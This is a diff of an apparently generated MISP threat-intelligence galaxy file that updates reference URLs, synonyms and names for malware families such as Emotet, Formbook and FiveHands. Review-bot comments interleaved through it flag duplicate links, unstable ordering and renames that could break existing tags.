 "https://www.youtube.com/watch?v=8PHCZdpNKrw",
 "https://www.govcert.admin.ch/blog/36/severe-ransomware-attacks-against-swiss-smes",
@@ -14595,13 +16823,14 @@
 "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-february-mummy-spider/",
 "https://github.com/mauronz/binja-emotet",
 "https://www.cert.pl/en/news/single/whats-up-emotet/",
+ "https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf",
 "https://persianov.net/emotet-malware-analysis-part-1",
 "https://persianov.net/emotet-malware-analysis-part-2",
 "https://mirshadx.wordpress.com/2020/11/22/analyzing-an-emotet-dropper-and-writing-a-python-script-to-statically-unpack-payload/",
 "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
- "https://www.eurojust.europa.eu/worlds-most-dangerous-malware-emotet-disrupted-through-global-action",
+ "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/",
 "https://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/",
- "https://www.binarydefense.com/emocrash-exploiting-a-vulnerability-in-emotet-malware-for-defense/",
+ "https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf",
 "https://marcoramilli.com/2019/10/14/is-emotet-gang-targeting-companies-with-external-soc/",
 "https://www.symantec.com/blogs/threat-intelligence/evolution-emotet-trojan-distributor",
 "https://blog.malwarebytes.com/trojans/2020/07/long-dreaded-emotet-has-returned/",
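Review bot: This hunk removes `https://www.binarydefense.com/emocrash-exploiting-a-vulnerability-in-emotet-malware-for-defense/` from the Emotet refs and, unlike the eurojust URL removed beside it (which is re-added in a later hunk of this same entry), it is not re-added anywhere visible in this diff; confirm the drop is intentional rather than a side effect of re-syncing the list, since the commit otherwise only reorders and adds. The replacement `https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf` is a newsletter CDN asset that is likely to stop resolving; an archive.org capture would be a more durable citation. The Emotet entry's refs array begins and ends outside this hunk.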
@@ -14614,23 +16843,27 @@ "https://quickheal.co.in/documents/technical-paper/Whitepaper_HowToPM.pdf", "https://unit42.paloaltonetworks.com/attack-chain-overview-emotet-in-december-2020-and-january-2021/", "https://r3mrum.wordpress.com/2021/01/05/manual-analysis-of-new-powersplit-maldocs-delivering-emotet/", - "https://www.spamhaus.org/news/article/783/emotet-adds-a-further-layer-of-camouflage", + "https://www.proofpoint.com/us/blog/threat-insight/q4-2020-threat-report-quarterly-analysis-cybersecurity-trends-tactics-and-themes", "https://isc.sans.edu/forums/diary/Emotet+infections+and+followup+malware/24532/", + "https://securelist.com/financial-cyberthreats-in-2020/101638/", "https://blog.intel471.com/2020/04/14/understanding-the-relationship-between-emotet-ryuk-and-trickbot/", + "https://www.picussecurity.com/blog/emotet-technical-analysis-part-2-powershell-unveiled", "https://blogs.jpcert.or.jp/en/2019/12/emotetfaq.html", "https://threatconnect.com/blog/research-roundup-activity-on-previously-identified-apt33-domains/", "https://www.youtube.com/watch?v=_mGMJFNJWSk", "https://www.bleepingcomputer.com/news/security/emotet-malware-hits-lithuanias-national-public-health-center/", + "https://www.telekom.com/en/blog/group/article/cybersecurity-dissecting-emotet-part-two-596128", "https://www.microsoft.com/security/blog/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/", "https://maxkersten.nl/binary-analysis-course/malware-analysis/emotet-droppers/", "http://ropgadget.com/posts/defensive_pcres.html", + "https://www.securityartwork.es/2021/06/16/analisis-campana-emotet/", "https://research.checkpoint.com/emotet-tricky-trojan-git-clones/", "https://blogs.jpcert.or.jp/en/2021/02/emotet-notice.html", "https://cert.grnet.gr/en/blog/reverse-engineering-emotet/", "https://www.bleepingcomputer.com/news/security/emotet-malware-now-steals-your-email-attachments-to-attack-contacts/", 
"https://intezer.com/blog/intezer-analyze/fantastic-payloads-and-where-we-find-them", "https://www.zscaler.com/blogs/research/emotet-back-action-after-short-break", - "https://www.proofpoint.com/us/blog/threat-insight/comprehensive-look-emotets-summer-2020-return", + "https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", "https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89", "https://intel471.com/blog/emotet-takedown-2021/", @@ -14643,6 +16876,7 @@ "https://lokalhost.pl/txt/peering.into.spam.botnets.VirusBulletin2017.pdf", "https://www.fortinet.com/blog/threat-research/deep-analysis-of-new-emotet-variant-part-2.html", "https://unit42.paloaltonetworks.com/domain-parking/", + "https://www.eurojust.europa.eu/worlds-most-dangerous-malware-emotet-disrupted-through-global-action", "https://spamauditor.org/2020/10/the-many-faces-of-emotet/", "https://www.hornetsecurity.com/en/security-informationen-en/webshells-powering-emotet/", "https://blog.kryptoslogic.com/malware/2018/08/01/emotet.html", 
@@ -14654,14 +16888,14 @@ "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_0_JPCERT_en.pdf", "https://github.com/d00rt/emotet_research", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", - "https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf", + "https://www.binarydefense.com/emocrash-exploiting-a-vulnerability-in-emotet-malware-for-defense/", "https://portswigger.net/daily-swig/emotet-trojan-implicated-in-wolverine-solutions-ransomware-attack", "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", "https://www.berlin.de/sen/justva/presse/pressemitteilungen/2020/pm-11-2020-t-systems-forensik_bericht_public_v1.pdf", "https://www.netskope.com/blog/you-can-run-but-you-cant-hide-advanced-emotet-updates", "https://isc.sans.edu/diary/rss/27036", "https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta542-banker-malware-distribution-service", - "https://www.telekom.com/en/blog/group/article/cybersecurity-dissecting-emotet-part-two-596128", + "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html", "https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/", "https://blog.talosintelligence.com/2020/02/coronavirus-themed-malware.html", "https://dissectingmalwa.re/return-of-the-mummy-welcome-back-emotet.html", 
@@ -14671,6 +16905,7 @@ "https://www.cert.pl/en/news/single/analysis-of-emotet-v4/", "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", "https://www.binarydefense.com/emotet-wi-fi-spreader-upgraded/", + "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree", "https://blog.malwarebytes.com/botnets/2019/09/emotet-is-back-botnet-springs-back-to-life-with-new-spam-campaign/", "https://www.bleepingcomputer.com/news/security/emotet-trickbot-malware-duo-is-back-infecting-windows-machines/", "https://www.bleepingcomputer.com/news/security/microsoft-emotet-took-down-a-network-by-overheating-all-computers/", @@ -14681,6 +16916,7 @@ "https://security-soup.net/quick-post-spooky-new-powershell-obfuscation-in-emotet-maldocs/", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-003.pdf", "https://blog.malwarebytes.com/threat-analysis/2021/01/cleaning-up-after-emotet-the-law-enforcement-file/", + "https://www.wiwo.de/my/technologie/digitale-welt/emotet-netzwerk-wie-eines-der-groessten-hacker-netzwerke-der-welt-lahmgelegt-wurde/27164048.html", "https://securelist.com/analysis/publications/69560/the-banking-trojan-emotet-detailed-analysis/", "https://www.digitalshadows.com/blog-and-research/how-cybercriminals-are-taking-advantage-of-covid-19-scams-fraud-misinformation/", "https://www.heise.de/ct/artikel/Was-Emotet-anrichtet-und-welche-Lehren-die-Opfer-daraus-ziehen-4665958.html", 
@@ -14700,18 +16936,21 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.empire_downloader",
- "https://paper.seebug.org/1301/",
 "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
- "https://us-cert.cisa.gov/ncas/alerts/aa20-275a",
 "https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/",
- "https://twitter.com/thor_scanner/status/992036762515050496",
+ "http://www.secureworks.com/research/threat-profiles/gold-burlap",
+ "https://decoded.avast.io/threatintel/decoding-cobalt-strike-understanding-payloads/",
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-275a",
+ "https://paper.seebug.org/1301/",
+ "http://www.secureworks.com/research/threat-profiles/gold-heron",
 "https://www.secureworks.com/research/threat-profiles/bronze-firestone",
- "https://www.secureworks.com/research/threat-profiles/gold-heron",
+ "https://twitter.com/thor_scanner/status/992036762515050496",
 "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
 "https://redcanary.com/blog/getsystem-offsec/",
 "https://www.secureworks.com/research/threat-profiles/gold-drake",
 "https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf",
 "https://www.secureworks.com/research/threat-profiles/gold-ulrick",
+ "https://www.secureworks.com/research/threat-profiles/gold-heron",
 "https://www.cyber.gov.au/sites/default/files/2020-06/ACSC-Advisory-2020-008-Copy-Paste-Compromises.pdf",
 "https://www.secureworks.com/research/threat-profiles/bronze-atlas"
 ],
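Review bot: The new side of this hunk carries the same Secureworks profile twice: `"http://www.secureworks.com/research/threat-profiles/gold-heron"` is added near the top of the refs array and `"https://www.secureworks.com/research/threat-profiles/gold-heron"` is added again after the gold-ulrick entry, so the list now holds a duplicate that differs only in scheme. Keep one entry, the https form, and treat the new `http://.../gold-burlap` line the same way, since plaintext links in a feed that tooling may fetch automatically are a needless downgrade. The hunk also deletes and re-inserts the cisa, seebug and twitter entries at other positions without changing them, which suggests the generator emits refs in an unstable order; sorting and deduplicating by normalized URL before emitting would remove this churn and make real additions reviewable. As this file is generated, the fix belongs in the generator rather than in a hand edit here.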
@@ -14767,6 +17006,23 @@ "uuid": "58071588-708d-447d-9fb4-8c9268142c82", "value": "Enviserv" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.epsilon_red", + "https://therecord.media/epsilonred-ransomware-group-hits-one-of-indias-financial-software-powerhouses/", + "https://news.sophos.com/en-us/2021/05/28/epsilonred/", + "https://cybleinc.com/2021/06/03/nucleus-software-becomes-victim-of-the-blackcocaine-ransomware/" + ], + "synonyms": [ + "BlackCocaine" + ], + "type": [] + }, + "uuid": "d6d0bf38-c85c-41d3-bc0e-3477b458563e", + "value": "Epsilon Red" + }, { "description": "", "meta": { @@ -14844,7 +17100,7 @@ "value": "Erica Ransomware" }, { - "description": "", + "description": "Ransomware.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.eris", @@ -14854,13 +17110,14 @@ "type": [] }, "uuid": "c4531af6-ab25-4266-af41-e01635a93abe", - "value": "Eris Ransomware" + "value": "Eris" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.eternalrocks", + "https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/", "https://github.com/stamparm/EternalRocks" ], "synonyms": [ @@ -14876,6 +17133,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.eternal_petya", + "https://go.recordedfuture.com/hubfs/reports/cta-2021-0909.pdf", "http://blog.talosintelligence.com/2017/10/bad-rabbit.html", "https://securelist.com/from-blackenergy-to-expetr/78937/", "https://www.washingtonpost.com/world/national-security/russian-military-was-behind-notpetya-cyberattack-in-ukraine-cia-concludes/2018/01/12/048d8506-f7ca-11e7-b34a-b85626af34ef_story.html", 
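Review bot: Renaming the cluster value from `"Eris Ransomware"` to `"Eris"` (the `-value`/`+value` pair in the 14854 hunk) changes the name MISP derives the galaxy tag from, so, if I read the tag naming correctly, instances that already tagged events with the old value will be left with a tag string that no longer maps to this cluster; the unchanged UUID helps cluster sync but not existing tag strings. Since the old name is simply dropped, I would carry it as `"synonyms": [ "Eris Ransomware" ]` so lookups on the previous name still resolve, and the same applies to the Exorcist and FCT renames later in this diff. The new `"description": "Ransomware."` is also thin for an entry whose refs are its only content; if the generator cannot pull a fuller description from upstream, a one-line summary of what the references cover would still help analysts.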
@@ -14889,6 +17147,7 @@ "http://blog.erratasec.com/2017/06/nonpetya-no-evidence-it-was-smokescreen.html", "https://www.crowdstrike.com/blog/petrwrap-technical-analysis-part-2-further-findings-and-potential-for-mbr-recovery/", "https://aguinet.github.io//blog/2020/08/29/miasm-bootloader.html", + "https://www.wired.com/story/hacker-lexicon-what-is-a-supply-chain-attack/", "https://www.riskint.blog/post/revisited-fancy-bear-s-new-faces-and-sandworms-too", "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/september/eternalglue-part-one-rebuilding-notpetya-to-assess-real-world-resilience/", "https://securelist.com/big-threats-using-code-similarity-part-1/97239/", @@ -14899,6 +17158,7 @@ "https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games", "http://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html", "https://www.wired.com/story/us-indicts-sandworm-hackers-russia-cyberwar-unit/", + "https://securityandtechnology.org/wp-content/uploads/2021/04/IST-Ransomware-Task-Force_Final_Report.pdf", "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/", "https://www.wired.com/story/badrabbit-ransomware-notpetya-russia-ukraine/", "https://www.crowdstrike.com/blog/fast-spreading-petrwrap-ransomware-attack-combines-eternalblue-exploit-credential-stealing/", 
@@ -14911,6 +17171,7 @@ "https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/", "https://securelist.com/apt-trends-report-q2-2019/91897/", "https://www.gdatasoftware.com/blog/2017/07/29859-who-is-behind-petna", + "https://docs.microsoft.com/en-us/security/compass/human-operated-ransomware", "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", "https://medium.com/@thegrugq/pnyetya-yet-another-ransomware-outbreak-59afd1ee89d4", "https://labsblog.f-secure.com/2017/10/27/the-big-difference-with-bad-rabbit/", @@ -14994,6 +17255,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilnum", + "https://mp.weixin.qq.com/s/lryl3a65uIz1AwZcfuzp1A", "https://github.com/eset/malware-ioc/tree/master/evilnum", "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/", "https://unit42.paloaltonetworks.com/cardinal-rat-sins-again-targets-israeli-fin-tech-firms/" 
@@ -15037,11 +17299,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.exaramel", - "https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf", - "https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/", "https://www.wired.com/story/sandworm-centreon-russia-hack/", - "https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/" + "https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/", + "https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf", + "https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf", + "https://www.welivesecurity.com/wp-content/uploads/2021/04/ESET_Industry_Report_Government.pdf" ], "synonyms": [], "type": [] @@ -15071,6 +17334,7 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.exchange_tool", "https://github.com/nccgroup/Royal_APT", + "https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/" ], "synonyms": [], @@ -15093,7 +17357,7 @@ "value": "Exile RAT" }, { - "description": "", + "description": "Ransomware.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.exorcist", @@ -15103,7 +17367,7 @@ "type": [] }, "uuid": "d742986c-04f0-48ef-aaa3-10eeb0e95be4", - "value": "Exorcist Ransomware" + "value": "Exorcist" }, { "description": "", 
@@ -15268,6 +17532,7 @@ "description": "FastLoader is a small .NET downloader, which name comes from PDB strings seen in samples. It typically downloads TrickBot. It may create a list of processes and uploads it together with screenshot(s). In more recent versions, it employs simple anti-analysis checks (VM detection) and comes with string obfuscations. \r\n", "meta": { "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.fastloader", "https://malpedia.caad.fkie.fraunhofer.de/details/win.fastloader" ], "synonyms": [], @@ -15293,6 +17558,19 @@ "uuid": "1bf03bbb-d3a2-4713-923b-218186c86914", "value": "FastPOS" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.fatal_rat", + "https://cybersecurity.att.com/blogs/labs-research/new-sophisticated-rat-in-town-fatalrat-analysis" + ], + "synonyms": [], + "type": [] + }, + "uuid": "28697d08-27c0-47a9-bfd6-654cac4d55cc", + "value": "FatalRat" + }, { "description": "According to ESET Research, FatDuke is the current flagship backdoor of APT29 and is only deployed on the most interesting machines. It is generally dropped by the MiniDuke backdoor, but ESET also have seen the operators dropping FatDuke using lateral movement tools such as PsExec.The operators regularly repack this malware in order to evade detections. The most recent sample of FatDuke that ESET have seen was compiled on May 24, 2019. They have seen them trying to regain control of a machine multiple times in a few days, each time with a different sample. Their packer, described in a later section, adds a lot of code, leading to large binaries. While the effective code should not be larger than 1MB, ESET have seen one sample weighing in at 13MB, hence our name for this backdoor component: FatDuke.", "meta": { @@ -15308,7 +17586,7 @@ "value": "FatDuke" }, { - "description": "", + "description": "Ransomware.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fct", 
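Review bot: The FastLoader hunk (15268) adds `"https://malpedia.caad.fkie.fraunhofer.de/details/win.fastloader",` directly above the identical existing reference, so the refs array now holds the same URL twice. Drop the added line; every other entry in this file carries its Malpedia link exactly once, and since this is generated output the refs should be deduplicated before emission so the duplicate cannot come back on the next regeneration. The new FatalRat entry in the 15293 hunk ships with `"description": ""` even though its AT&T reference is a full analysis; a one-sentence description of what the RAT does, drawn from that reference, would make the cluster usable without following the link.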
@@ -15318,7 +17596,7 @@ "type": [] }, "uuid": "a4eb3f1f-2cc6-4a0f-9dd8-6ebc192ec0cd", - "value": "FCT Ransomware" + "value": "FCT" }, { "description": "", @@ -15373,8 +17651,14 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fickerstealer", + "https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf", + "https://www.spamhaus.com/custom-content/uploads/2021/04/Botnet-update-Q1-2021.pdf", "https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a", - "https://twitter.com/3xp0rtblog/status/1321209656774135810" + "https://twitter.com/3xp0rtblog/status/1321209656774135810", + "https://www.cyberark.com/resources/threat-research-blog/fickerstealer-a-new-rust-player-in-the-market", + "https://www.binarydefense.com/analysis-of-hancitor-when-boring-begets-beacon", + "https://blogs.blackberry.com/en/2021/08/threat-thursday-ficker-infostealer-malware", + "https://www.bleepingcomputer.com/news/security/fake-microsoft-store-spotify-sites-spread-info-stealing-malware/" ], "synonyms": [], "type": [] @@ -15427,6 +17711,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.findpos", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", "https://researchcenter.paloaltonetworks.com/2015/03/findpos-new-pos-malware-family-discovered/", "https://blogs.cisco.com/security/talos/poseidon" ], 
@@ -15444,10 +17729,12 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.finfisher", "https://www.welivesecurity.com/2017/09/21/new-finfisher-surveillance-campaigns/", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", "https://artemonsecurity.blogspot.de/2017/01/finfisher-rootkit-analysis.html", "https://cloudblogs.microsoft.com/microsoftsecure/2018/03/01/finfisher-exposed-a-researchers-tale-of-defeating-traps-tricks-and-complex-virtual-machines/", "https://netzpolitik.org/2020/our-criminal-complaint-german-state-malware-company-finfisher-raided/", "https://www.codeandsec.com/FinFisher-Malware-Analysis-Part-2", + "https://securelist.com/finspy-unseen-findings/104322/", "https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/", "https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf", "http://www.msreverseengineering.com/blog/2018/1/23/a-walk-through-tutorial-with-code-on-statically-unpacking-the-finspy-vm-part-one-x86-deobfuscation", 
@@ -15529,6 +17816,24 @@ "uuid": "1ab17959-6254-49af-af26-d34e87073e49", "value": "FirstRansom" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.fivehands", + "https://research.nccgroup.com/2021/06/15/handy-guide-to-a-new-fivehands-ransomware-variant/", + "https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html", + "https://www.crowdstrike.com/blog/new-ransomware-variant-uses-golang-packer/", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126b", + "https://www.fireeye.com/blog/threat-research/2021/06/darkside-affiliate-supply-chain-software-compromise.html", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a" + ], + "synonyms": [], + "type": [] + }, + "uuid": "4d0dc7a3-07bf-4cb9-ba86-c7f154c6b678", + "value": "FiveHands" + }, { "description": "", "meta": { @@ -15585,6 +17890,7 @@ "https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do", "https://blog.trendmicro.com/trendlabs-security-intelligence/ta505-at-it-again-variety-is-the-spice-of-servhelper-and-flawedammyy/", "https://www.proofpoint.com/us/threat-insight/post/ta505-abusing-settingcontent-ms-within-pdf-files-distribute-flawedammyy-rat", + "https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-xakerske-ugrupovannya-u-rozpovsyudzhenni-virusu-shifruvalnika-ta-nanesenni-inozemnim-kompaniyam-piv-milyarda-dolariv-zbitkiv/", "https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf", "https://www.proofpoint.com/us/threat-insight/post/leaked-source-code-ammyy-admin-turned-flawedammyy-rat" ], 
@@ -15658,6 +17964,7 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/win.flowcloud", "https://www.proofpoint.com/us/blog/threat-insight/flowcloud-version-413-malware-analysis", "https://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new", + "https://www.dragos.com/blog/industry-news/new-ics-threat-activity-group-talonite/", "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape", "https://nao-sec.org/2021/01/royal-road-redive.html" ], @@ -15755,7 +18062,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fonix", - "https://labs.sentinelone.com/the-fonix-raas-new-low-key-threat-with-unnecessary-complexities/" + "https://labs.sentinelone.com/the-fonix-raas-new-low-key-threat-with-unnecessary-complexities/", + "https://labs.bitdefender.com/2021/02/fonix-ransomware-decryptor/" ], "synonyms": [], "type": [] @@ -15770,9 +18078,11 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook", "https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/", "https://www.botconf.eu/wp-content/uploads/2018/12/2018-R-Jullian-In-depth-Formbook-Malware-Analysis.pdf", + "https://blog.malwarebytes.com/threat-analysis/2021/05/revisiting-the-nsis-based-crypter/", "http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html", "https://link.medium.com/uaBiIXgUU8", "https://usualsuspect.re/article/formbook-hiding-in-plain-sight", + "https://blogs.blackberry.com/en/2021/09/threat-thursday-xloader-infostealer", "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors", "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", "https://www.cyberbit.com/blog/endpoint-security/formbook-research-hints-large-data-theft-attack-brewing/", 
@@ -15780,23 +18090,34 @@
 "https://tccontre.blogspot.com/2020/11/interesting-formbook-crypter.html",
 "https://isc.sans.edu/diary/26806",
 "https://drive.google.com/file/d/1oxINyIJfMtv_upJqRK9vLSchIBaU8wiU/view",
+ "https://blogs.quickheal.com/formbook-malware-returns-new-variant-uses-steganography-and-in-memory-loading-of-multiple-stages-to-steal-data/",
 "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko",
 "https://www.hornetsecurity.com/en/threat-research/vba-purging-malspam-campaigns/",
- "https://www.fireeye.com/blog/threat-research/2017/10/formbook-malware-distribution-campaigns.html",
+ "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/",
 "https://www.peerlyst.com/posts/how-to-understand-formbook-a-new-malware-as-a-service-sudhendu?",
 "https://blog.talosintelligence.com/2019/07/sweed-agent-tesla.html",
 "https://www.arbornetworks.com/blog/asert/formidable-formbook-form-grabber/",
 "https://thisissecurity.stormshield.com/2018/03/29/in-depth-formbook-malware-analysis-obfuscation-and-process-injection/",
+ "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
+ "https://www.cyberbit.com/formbook-research-hints-large-data-theft-attack-brewing/",
 "https://news.sophos.com/en-us/2020/05/14/raticate/",
 "https://www.virusbulletin.com/virusbulletin/2019/01/vb2018-paper-inside-formbook-infostealer/",
+ "https://www.trendmicro.com/en_us/research/21/i/formbook-adds-latest-office-365-0-day-vulnerability-cve-2021-404.html",
+ "https://www.fortinet.com/blog/threat-research/deep-analysis-formbook-new-variant-delivered-phishing-campaign-part-ii",
 "http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/",
- "https://www.cyberbit.com/formbook-research-hints-large-data-theft-attack-brewing/",
+ "https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf",
+ "https://securityintelligence.com/posts/roboski-global-recovery-automation/",
+ "https://youtu.be/aQwnHIlGSBM",
 "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware",
 "http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html",
 "https://insights.oem.avira.com/a-new-technique-to-analyze-formbook-malware-infections/",
- "https://blog.talosintelligence.com/2018/06/my-little-formbook.html"
+ "https://www.fortinet.com/blog/threat-research/deep-analysis-new-formbook-variant-delivered-phishing-campaign-part-I",
+ "https://blog.talosintelligence.com/2018/06/my-little-formbook.html",
+ "https://www.fireeye.com/blog/threat-research/2017/10/formbook-malware-distribution-campaigns.html"
+ ],
+ "synonyms": [
+ "win.xloader"
 ],
- "synonyms": [],
 "type": []
 },
 "uuid": "8378b417-605e-4196-b31f-a0c96d75aa50",
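Review bot: The synonym added for Formbook at the end of this hunk is `"win.xloader"`, which is Malpedia's internal family slug rather than an alias an analyst would search for; every other synonym in this file is a display name (`"AxeSpy"`, `"BlackCocaine"`), and the BlackBerry reference added for this entry names the family XLoader. I would emit `"synonyms": [ "XLoader" ]` and, if the generator is turning Malpedia's related-family identifiers into synonyms, map them through the family's common name before writing them out so the slug does not become a galaxy tag. The hunk opens on the preceding line; the refs it adds look fine apart from the two roboski write-ups (ciphertechsolutions and securityintelligence), which appear to be the same article on two hosts and may be worth collapsing to one.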
@@ -15866,23 +18187,29 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.friedex", "https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/csi-evidence-indicators-for-targeted-ransomware-attacks/", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://www.bleepingcomputer.com/news/security/new-evil-corp-ransomware-mimics-payloadbin-gang-to-evade-us-sanctions/", + "https://www.crowdstrike.com/blog/big-game-hunting-the-evolution-of-indrik-spider-from-dridex-wire-fraud-to-bitpaymer-targeted-ransomware/", + "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/", + "https://sites.temple.edu/care/ci-rw-attacks/", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/research/everis-bitpaymer-ransomware-attack-analysis-dridex/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + 